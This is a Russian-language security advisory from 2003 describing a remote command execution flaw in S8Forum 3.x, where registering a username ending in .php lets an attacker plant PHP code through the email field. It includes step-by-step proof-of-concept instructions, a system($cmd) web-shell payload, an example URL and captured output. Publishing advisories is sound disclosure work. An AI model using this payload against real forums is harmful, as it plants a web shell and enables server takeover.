Удаленное выполнение произвольных команд в S8Forum
| Дата публикации: | 13.01.2003 |
| Всего просмотров: | 1215 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | S8Forum 3.x |
| Описание: | S8Forum (http://www.kellishaver.com/) уязвим к удаленному выполнению произвольных команд. Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример: - go to Register - insert in Username: any_name.php NOTE: .php :) - in password : any_pasword. - in E-Mail: <? system($cmd); ?> or any code :( - now go to this URL: http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a ------ out --- evil.php:c4ca4238a0b923820dcc509a6f75849b Linux xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002 i686 unknown ------ out ---Уязвимость обнаружена в Kelli Shaver S8Forum 3.0 |
| Ссылки: | A security vulnerability in S8Forum |